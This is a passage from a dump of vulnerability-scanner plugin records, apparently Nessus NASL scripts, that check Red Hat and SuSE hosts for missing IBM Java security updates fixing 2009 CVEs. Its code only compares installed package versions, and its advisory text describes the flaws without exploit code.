The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43048);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\", \"CVE-2010-0079\");\n script_bugtraq_id(36881);\n script_xref(name:\"RHSA\", value:\"2009:1643\");\n\n script_name(english:\"RHEL 3 / 4 / 5 : java-1.4.2-ibm (RHSA-2009:1643)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.4.2-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 3 Extras, Red Hat\nEnterprise Linux 4 Extras, and Red Hat Enterprise Linux 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM 'Security alerts' page\nlisted in the References section. (CVE-2009-3867, CVE-2009-3868,\nCVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873,\nCVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. 
All\nrunning instances of IBM Java must be restarted for this update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3867\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3868\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3869\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3873\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3874\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3876\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3877\"\n );\n # http://www.ibm.com/developerworks/java/jdk/alerts/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://developer.ibm.com/javasdk/support/security-vulnerabilities/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:1643\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-javacomm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/07\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1643\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"java-1.4.2-ibm-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"java-1.4.2-ibm-demo-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"java-1.4.2-ibm-devel-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", cpu:\"s390\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"java-1.4.2-ibm-plugin-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"java-1.4.2-ibm-src-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.4.2-ibm-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.4.2-ibm-demo-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.4.2-ibm-devel-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if 
(rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.4.2-ibm-javacomm-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.4.2-ibm-javacomm-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"s390\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.4.2-ibm-plugin-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.4.2-ibm-src-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.4.2-ibm-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.4.2-ibm-demo-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.4.2-ibm-devel-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.4.2-ibm-javacomm-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.4.2-ibm-javacomm-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.4.2-ibm-plugin-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.4.2-ibm-src-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 
\"java-1.4.2-ibm / java-1.4.2-ibm-demo / java-1.4.2-ibm-devel / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:44:38", "description": "IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues.\n\nThe timezone update to 1.6.9s (with the latest Fiji change).\n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876 / CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. 
For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. 
A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also see http://www.ibm.com/developerworks/java/jdk/alerts/", "edition": 24, "published": "2010-10-11T00:00:00", "title": "SuSE 10 Security Update : IBM Java 1.5.0 (ZYPP Patch Number 6741)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2493", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "modified": "2010-10-11T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_JAVA-1_5_0-IBM-6741.NASL", "href": "https://www.tenable.com/plugins/nessus/49863", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49863);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-2493\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"SuSE 10 Security Update : IBM Java 1.5.0 (ZYPP Patch Number 6741)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues.\n\nThe timezone update to 1.6.9s (with the latest Fiji change).\n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876 / CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. 
(CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. 
This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also see http://www.ibm.com/developerworks/java/jdk/alerts/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-2493.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3867.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3868.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3869.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3871.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3872.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3873.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3874.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3875.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3876.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3877.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6741.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 264, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"java-1_5_0-ibm-1.5.0_sr11-0.4.2\")) flag++;\nif 
(rpm_check(release:\"SLED10\", sp:3, reference:\"java-1_5_0-ibm-demo-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"java-1_5_0-ibm-devel-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"java-1_5_0-ibm-src-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"java-1_5_0-ibm-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"java-1_5_0-ibm-devel-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr11-0.4.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, 
extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:44:37", "description": "IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues.\n\nThe timezone update to 1.6.9s (with the latest Fiji change).\n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876 / CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. 
For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. 
